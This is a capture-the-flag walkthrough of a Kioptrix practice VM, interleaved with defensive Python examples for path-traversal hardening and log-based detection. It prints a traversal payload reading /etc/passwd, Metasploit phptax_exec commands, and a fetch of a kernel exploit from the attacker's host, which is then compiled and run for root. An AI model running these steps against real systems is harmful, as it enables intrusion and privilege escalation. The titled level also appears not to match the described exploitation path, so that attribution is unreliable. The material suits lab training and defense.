
Hack the Kioptrix VM (CTF Challenge)

Today we are going to solve Kioptrix: Level 1.3 (#4). It is part of a Boot2Root series provided for practice. The hints we have from the author are:
  • It’s possible to remotely compromise the machine
  • Stays within the target audience of this site
  • Must be “realistic” (well kinda…)
  • Should serve as a refresher for me. Be it PHP or MySQL usage etc.
So basically, its security level ranges from beginner to intermediate. Let's try to break through it. But before that, please note that you can download it from https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
WalkThrough
As always start off by finding the target.
netdiscover

And so our target is 192.168.0.101. We will now scan it via nmap.
nmap -p- -A 192.168.0.101

From the nmap result you can see that an HTTP service is running on two ports, 80 and 8080, along with SSH on port 22. As we have an HTTP service running, we should try to open it in our browser.
There is nothing on the webpage except the text "It works!", so let's have a look at its source code.

In its source code there is a URL mentioned, i.e. pChart2.1.3/index.php. Open this URL.

And so the URL opens and takes us to a PHP library. pChart is basically a PHP library that helps us create or manage anti-aliased charts or pictures directly from the web server. I searched Google to learn more about it and stumbled upon some useful information: this version of pChart is vulnerable. Therefore, I searched for its exploit on exploit-db.com.
And so I found an appropriate exploit. When you explore the exploit there is a link given:
hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
I opened this link, except that I used the VM's IP, and found the following page:
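The link above works because the Script parameter is decoded and joined onto the examples directory without any check that the result still lies inside it. The following is an added example, not code from the page or from the pChart project: it reproduces that flawed pattern in Python beside two hardened variants, a containment check built on realpath/commonpath and a plain allowlist of script names. The examples directory /var/www/examples is an assumption (the exploit-db link places examples/ at the web root); the exact directory the traversal lands in depends on how deep that path is, and the point is only that it escapes the base directory.

```python
import os
from urllib.parse import unquote

# Assumed location of the pChart examples directory (constructed for this
# example; the exploit-db link shows examples/ directly under the web root).
EXAMPLES_DIR = "/var/www/examples"


def vulnerable_script_path(base_dir, script_param):
    """Mirrors the flawed pattern: URL-decode the parameter and glue it onto
    the directory with no containment check, so '../' walks out of it."""
    return os.path.normpath(base_dir + "/" + unquote(script_param))


def safe_script_path(base_dir, script_param):
    """Hardened version: canonicalise the requested path and refuse anything
    whose resolved form is not under base_dir. Returns None when rejected."""
    base = os.path.realpath(base_dir)
    decoded = unquote(script_param)
    # Empty names, embedded NULs and absolute paths are never legitimate here.
    if not decoded or "\x00" in decoded or os.path.isabs(decoded):
        return None
    candidate = os.path.realpath(os.path.join(base, decoded))
    # commonpath is the containment test; a plain startswith() would wrongly
    # accept "/var/www/examples_private/x" as being inside "/var/www/examples".
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def allowlisted_script_path(base_dir, script_param, allowed):
    """Stricter still: serve only names from a fixed set of example scripts.
    This is the right design when the viewable files are known up front."""
    name = unquote(script_param)
    if name not in allowed:
        return None
    return os.path.join(os.path.realpath(base_dir), name)


if __name__ == "__main__":
    payload = "%2f..%2f..%2fetc/passwd"  # the parameter from the exploit link
    print("vulnerable :", vulnerable_script_path(EXAMPLES_DIR, payload))
    print("hardened   :", safe_script_path(EXAMPLES_DIR, payload))
    print("allowlisted:", allowlisted_script_path(EXAMPLES_DIR, payload, {"index.php"}))
```

Run it as a script to see the three resolutions side by side: the vulnerable function returns a path outside the examples directory, while both hardened functions return None for the same input and a normal path for an ordinary script name.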

The information on this page isn't useful at all. Then I remembered that the HTTP service was open on port 8080 too, so I opened the IP on port 8080.
But access was forbidden. I tried every method I could think of to bypass this forbidden access, but nothing worked other than changing the user agent. So to access this page, go to the Tools menu in the menu bar. A drop-down menu will appear; from this menu select Default User Agent. Another menu will open; from it select Internet Explorer, and from the next menu select Internet Explorer 6.
And fortunately we now have access to the page, where we find a directory called phptax/
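The two things that happened so far, a directory traversal served with a 200 and a 403 on port 8080 that turned into a 200 once the User-Agent changed, both leave a clear trace in the web server's access log. A User-Agent header is chosen by the client, so a rule keyed on it is a content filter, not an access control, and the defender's signal is a client that is refused and then admitted on the same path under a different User-Agent. The following is an added example, not part of the original walkthrough: a small detector over Apache combined-format log lines that flags decoded "../" sequences (including double-encoded ones) and the 403-then-200 User-Agent switch. The log lines are constructed for the example; the request paths and client address mirror the walkthrough, and in a real deployment the port-8080 requests would come from that virtual host's own log.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log sample (not real logs from the VM). The
# client 192.168.0.104 is the attacking machine named in the walkthrough.
SAMPLE_LOG = """\
192.168.0.50 - - [01/Jan/2019:09:58:11 +0000] "GET /index.html HTTP/1.1" 200 177 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"
192.168.0.104 - - [01/Jan/2019:10:00:01 +0000] "GET /pChart2.1.3/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"
192.168.0.104 - - [01/Jan/2019:10:00:19 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"
192.168.0.104 - - [01/Jan/2019:10:02:40 +0000] "GET / HTTP/1.1" 403 212 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"
192.168.0.104 - - [01/Jan/2019:10:03:05 +0000] "GET / HTTP/1.1" 200 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def decode_fully(s, rounds=3):
    """URL-decode repeatedly (bounded) so %252e%252e%252f is seen as ../ too."""
    for _ in range(rounds):
        new = unquote(s)
        if new == s:
            break
        s = new
    return s


def has_traversal(path):
    """True when the decoded request path contains a parent-directory step."""
    decoded = decode_fully(path).replace("\\", "/")
    return "../" in decoded or decoded.endswith("/..")


def analyze(log_text):
    """Scan log text and return a list of findings in log order."""
    findings = []
    denied = {}  # (ip, path) -> set of User-Agents that received a 403 there
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if e is None:
            continue
        key = (e["ip"], e["path"])
        if has_traversal(e["path"]):
            findings.append({"kind": "path_traversal", "ip": e["ip"],
                             "detail": decode_fully(e["path"])})
        if e["status"] == 403:
            denied.setdefault(key, set()).add(e["ua"])
        elif 200 <= e["status"] < 300 and key in denied and e["ua"] not in denied[key]:
            findings.append({"kind": "ua_switch_after_403", "ip": e["ip"],
                             "detail": '%s allowed for "%s" after 403 for %s'
                                       % (e["path"], e["ua"], sorted(denied[key]))})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["kind"], f["ip"], f["detail"])
```

Run on the sample it reports two findings for 192.168.0.104: the traversal request and the root path that was refused for Firefox and then served for the IE6 string. In practice the second rule is a heuristic and should be joined with the same client's other requests before anyone acts on it; the first rule is a reliable alert on its own, because a legitimate link never needs a decoded "../".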

Now open this link and you will see the following page:

The page belongs to phptax. Phptax is a kind of CMS for Linux. Its aim is to provide a tax program that uses a database-less design which fits in one-line text files, so using phptax does not require the SQL databases that programs of this kind generally use. And to our luck there is an exploit for phptax in Metasploit; to find it, simply type search phptax in Metasploit.
To use this exploit, simply type the following in Metasploit:
use exploit/multi/http/phptax_exec
set rhost 192.168.0.101
set rport 8080
exploit
After this, you will directly reach the shell; then type:
id
uname -a
These two commands show the current user id and the kernel version.

There is an exploit for this version of the kernel on exploit-db.com. Download it and save the file as shown:

Next, type the following command to get the exploit from its default location:
fetch http://192.168.0.104/28818.c
Here we used the fetch command because wget wasn't working, as the security level here was a bit high. So fetch is a substitute for wget, and with it we pull the file directly from the web server.
Then type the following set of commands to compile and execute the exploit:
ls
gcc -o exploit 28818.c
ls
chmod 777 exploit
./exploit
As the exploit executes you will reach root. To confirm this, type:
id
Then, moving forward, go to the root folder by typing:
cd /root
Let's see what it contains; for that type:
ls
Here we have a text file named congrats.txt, and I am hoping this will be our flag, so to read it type:
cat congrats.txt


Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast
